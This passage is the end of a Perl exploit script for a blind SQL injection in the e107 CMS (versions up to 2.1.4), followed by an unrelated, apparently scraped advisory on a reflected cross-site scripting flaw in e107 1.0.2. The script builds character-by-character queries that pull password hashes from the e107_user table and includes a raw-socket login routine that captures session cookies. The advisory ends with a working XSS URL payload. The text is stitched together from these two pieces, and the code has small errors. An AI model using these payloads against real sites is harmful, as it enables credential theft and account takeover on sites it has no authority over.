   }		   
}



if (length($hash) == 60) {
   die "\[-]Exploit Successfully";
}
else {
   die "\n[-] Exploit Failed";
}   





sub e107::Query 
{
     
      # 1st parameter, sql query
      # 2nd parameter, e107 website	  

	  my ($query,$URL) = @_;
      my $response = undef; 
	  
      my $lwp = new LWP::UserAgent;


      $lwp->default_header('User-Agent' => 'Lynx (textmode)');

      $response = $lwp->post($URL."/pm/",
                            [ 
			     keyword => $query
			    ]) or die $!;


        if ($response->content =~ /caption/) {
		   return 666;
		} 
        else {
           return 0;
        }		   
		 
}


sub parse::URL
{
        my $string = shift @_ || die($!);
         
        if ($string !~ /^http:\/\/?/i) {
                $string = 'http://'.$string;
        }
         
        return $string;
 }
 


sub sql
{
       
      # 1st parameter, an e107's userid
      # 2nd parameter substring number
      # 3rd parameter charcode number

      my ($i,$j,$sql) = (shift,shift,undef);
       
      $sql = "' AND ASCII(SUBSTRING((SELECT user_password FROM e107_user WHERE user_id=".$uid."),".$i.",1))=".$j."#";
              
      return $sql;        
}        





sub e107::Cookies
{

        my ($username,$password) = @_;
        my ($packet,$content);
        
        my $host = "127.0.0.1";   # Valid Host  (insert it manually)
		my $path = "/e107/";      # Valid e107 path (insert it manually)
		
		
		my $data = "username=",$username."&userpass=".$password."&userlogin=Sign+In";
		
		
		my $socket  = new IO::Socket::INET(
                                            PeerAddr => $host,
                                            PeerPort => 80,
                                            Proto    => 'tcp',
                                          ) or die $!;
		
		
		 
        $packet .= "POST ".$path."/login.php HTTP/1.1\r\n";
        $packet .= "Host: ".$host."\r\n";
        $packet .= "User-Agent: Lynx (textmode)\r\n";
        $packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
        $packet .= "Content-Length:".length($data)."\r\n";
        $packet .= "Connection: close\r\n\r\n";
        $packet.= $data;
		
        
		$socket->send($packet);
		
		while (<$socket>) {
		  $content .= $_;
		}  
		
		
		if ($content =~ /Set-Cookie: (.+?)/) {
		    return $1;
	    }
        else {
            die("[-] Login Failed..\n");
        }			
		
		
	# This function is useful to log-in and retrieves your cookies, but you don't need it for this exploit.
        # it works without log-in, but if you got some trouble, try to use this one.
        
	# e107::Login('YOUR USERNAME','YOUR PASSWORD');
}		
		
		
sub usage() {
         
        print "[*---------------------------------------------------------*]\n".
              "[*  e107 <= 2.1.4 'keyword' Blind SQL Injection Exploit    *]\n".
              "[*---------------------------------------------------------*]\n". 
              "[* Usage: perl web.pl [host] [uid]                         *]\n".
              "[*                                                         *]\n".
              "[* Options:                                                *]\n".
              "[* [host] insert a valid host                              *]\n".
              "[* [uid]  insert a userid                                  *]\n".
              "[*---------------------------------------------------------*]\n";        
      exit;                       
    
}
HireHackking 
source: https://www.securityfocus.com/bid/58841/info

e107 is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

e107 1.0.2 is vulnerable; other versions may also be affected. 

http://www.example.com/e107_plugins/content/handlers/content_preset.php? %3c%00script%0d%0a>alert('reflexted%20XSS')</script>